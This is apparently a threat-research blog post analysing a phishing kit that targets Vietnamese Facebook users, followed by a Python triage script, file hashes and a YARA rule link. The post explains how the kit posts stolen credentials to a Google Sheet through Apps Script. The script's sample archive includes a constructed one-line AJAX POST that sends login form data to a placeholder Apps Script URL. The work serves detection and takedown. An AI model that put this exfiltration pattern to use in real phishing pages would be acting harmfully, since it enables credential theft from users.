We operate a StalkPhish instance that scans thousands of suspicious links a day, so we often find, let's say, original phishing kits to analyse. Today we found a phishing kit targeting Vietnamese Facebook users.

We retrieved the source code because the zip file was still on the server. The phishing kit's zip archive contains only a page, some images and CSS, and a JavaScript function.

There is no e-mail exfiltration vector of the kind we commonly see: this kit uses a Google Sheets form AJAX POST function to exfiltrate stolen credentials!
Reading the HTML source code, we can see that the page grabs the victim's IP address, domain and date.

It also collects the identifiers entered by users.

Then validation-function.js is called. After validating and serializing the data, this JavaScript function sends the stolen data to a Google Sheet via a POST request, using the sheet as a database.


This function uses a Google Apps Script function, which allows writing into a Google Sheet through the API!
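For triage of other retrieved kit archives, the following added example (not code from the kit or from StalkPhish) flags files that reference a Google Apps Script web app endpoint and also submit data by POST, which is the exfiltration pattern described above. It assumes the standard web app URL shape `https://script.google.com/macros/s/<ID>/exec`; the sample archive, its directory layout, the placeholder ID and the 5 MB size limit are constructed for the example.

```python
import io
import re
import zipfile

# Google Apps Script web apps are served from this URL shape (assumed here;
# the kit's real endpoint is not shown on the page).
APPS_SCRIPT_URL = re.compile(
    r"https://script\.google\.com/macros/s/[A-Za-z0-9_-]+/exec")
# Signs that the same file submits data over HTTP POST.
POST_HINT = re.compile(
    r"""(?:method|type)\s*[:=]\s*["']post["']|\$\.post\s*\(""", re.I)
SCANNED_EXT = (".html", ".htm", ".js", ".php")


def scan_kit(zip_bytes):
    """Return one finding per file that references an Apps Script endpoint."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as kit:
        for info in kit.infolist():
            if info.is_dir() or not info.filename.lower().endswith(SCANNED_EXT):
                continue
            if info.file_size > 5_000_000:  # skip oversized members
                continue
            text = kit.read(info).decode("utf-8", errors="replace")
            urls = sorted(set(APPS_SCRIPT_URL.findall(text)))
            if urls:
                findings.append({
                    "file": info.filename,
                    "endpoints": urls,
                    "posts_data": bool(POST_HINT.search(text)),
                })
    return findings


def build_sample_kit():
    """Constructed sample archive; the endpoint ID is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("index.html", "<form id='login'><input name='email'></form>")
        z.writestr("css/style.css", "body { margin: 0 }")
        z.writestr("js/validation-function.js",
                   "var u = 'https://script.google.com/macros/s/PLACEHOLDER_ID/exec';\n"
                   "$.ajax({url: u, method: 'POST', data: $('#login').serialize()});")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_kit(build_sample_kit()):
        print(finding)
```

A hit is a lead rather than a verdict, since legitimate sites also post forms to Apps Script; the extracted endpoint is the value to report to Google for takedown.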
Takeaways
index.html (SHA256): 3cfd92bdd9a801382199a52624ecaa8b78a32dc80893f0a6186cce4128c6552b
phishing kit archive (SHA256): 34ee59548f8ba626568d91393acb76791a559f958c1f61bf5dabeb425e396640
Phishing Kit Yara Rule: https://github.com/t4d/PhishingKit-Yara-Rules/blob/master/PK_Facebook_GSheet.yar